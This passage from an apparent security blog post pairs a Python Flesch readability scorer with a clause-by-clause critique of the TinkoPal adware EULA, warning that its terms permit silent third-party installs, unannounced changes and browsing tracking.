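        n -= 1  # "provide", "sole": the final e is silent
    return max(n, 1)


def readability(text: str) -> dict:
    """Return word/sentence/syllable counts plus both Flesch scores."""
    words = re.findall(r"[A-Za-z']+", text)
    if not words:
        return {"words": 0, "sentences": 0, "syllables": 0, "grade": 0.0, "ease": 0.0}
    sentences = max(len(re.findall(r"[.!?]+", text)), 1)
    syllables = sum(count_syllables(w) for w in words)
    wps = len(words) / sentences  # words per sentence
    spw = syllables / len(words)  # syllables per word
    return {
        "words": len(words),
        "sentences": sentences,
        "syllables": syllables,
        "grade": round(0.39 * wps + 11.8 * spw - 15.59, 2),
        "ease": round(206.835 - 1.015 * wps - 84.6 * spw, 2),
    }


def beyond_twelfth_grade(text: str) -> bool:
    """The threshold the post applies: a grade above 12 needs college-level reading."""
    return readability(text)["grade"] > 12


if __name__ == "__main__":
    print(readability(SENTENCE_7), "beyond 12th grade:", beyond_twelfth_grade(SENTENCE_7))
```

The single 38-word sentence lands well past the 12th-grade line, in the same range as the post's Flesch grade of 22; the long sentence and multi-syllable legal vocabulary both drive the score up.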
In this EULA there are some interesting clauses that might surprise the user if not read carefully. Here are a few reasons people don't seem to care for the after effects of an adware install- especially in the Enterprise environment. This agreement (which again requires the equivalent of a college degree to truly understand it) is patently ridiculous and potentially dangerous because it grants the company the ability to upload arbitrary code. Our advice is to avoid the application completely.
Let's take a deep dive and look at some key aspects of this EULA.
Once again- my comments will be in bold text surrounded by parentheses and are not a part of the EULA.
Sentence 5: By accepting to download the TinkoPal you are also accepting that TinkoPal may also deliver to you advertisements. (So if you take the download you can expect advertisements- you don't know what kind or where, only there will be advertisements.)
Sentence 6: The timing, frequency, placement and extent of advertising is subject to change and shall be determined by TinkoPal at its sole discretion. (You might get one ad a day, or you might get a hundred ads a day- it is entirely up to them.)
Sentence 7: TinkoPal may from time to time, at its sole discretion, provide automatic upgrades to the Software through electronic dissemination and other means to add capabilities, functionality, or enhancements and may also include third party applications with its upgrades. (This is a deal killer- Tinkopal is basically saying they can upload third party applications to your machine with an "upgrade"- what kind of applications? You don't know.)
Sentence 26: Modifications of Agreement TinkoPal may modify this Agreement or the Software or Services provided at any time without providing notice to you. (Nice one- they can change, modify or do about anything they want, and they don't have to tell you about it. Completely absurd.)
Sentence 27: Such modification will be made by posting a revised agreement on its web site and such modification shall be deemed effective immediately upon posting of the modified Agreement. (Strange- if they do modify the agreement it is effective instantly upon posting the modified agreement which in the sentence above, they just told you they didn't have to tell you about.)
Sentence 35: Attached Files This Product contains and will install technology that enables third party companies, sponsors, advertisers or TinkoPal to deliver additional products or software applications to the End-Users' system. (OK pretty clear you will get technology that enables other companies, whoever they are, to deliver you even more products or applications that we really don't know anything about.)
Sentence 39: TinkoPal also includes third party applications from our advertising partner (ABI NETWORK ADVERTISING SOFTWARE) Terms and conditions: http://www.abetterinternet.com/policies.htm 1. Acceptance of This Agreement - This End User License Agreement ("Agreement") is a contract between you ("you") and BetterInternet, LLC ("ABI") and governs your use of software downloaded from abetterinternet.com ("Software"). Please read the terms of this Agreement carefully before downloading, installing and using the Software. (This is one piece of good advice- read this masterpiece carefully because it is set up so that you lose in the deal.)
Sentence 40: This Software will collect information about websites you access and will use that information to display advertising on your computer. (Somehow I don't find this surprising; basically they will collect information about where you go so they can give you ads. I wonder if they collect your secure banking URLs too?)
Sentence 42: Moreover, the ads will appear while you are surfing the Web, not just when you use the Software. (This is a great added value. Not only do you get ads for using the software, you get them while you surf, and remember from the clause above we really don't know how many you are going to get. Pick a number- no wait they get to pick the number.)
Sentence 45: 2. Functionality - This Software delivers advertising as well as various promotional messages to your computer screen while you view Internet web pages. (We know that, but I am not sure what kind of advertising I am getting or exactly where or how these promotional messages are going to be delivered.)
Sentence 47: In addition, the Software may be bundled with or installed in connection with Promotional Applications (see Section 14 below for more information about Promotional Applications). By installing the Software, you understand and agree that the Software may, without any additional notice to you, perform the following: display pop-up ads and various other ad formats of third party advertisers; display links to and advert |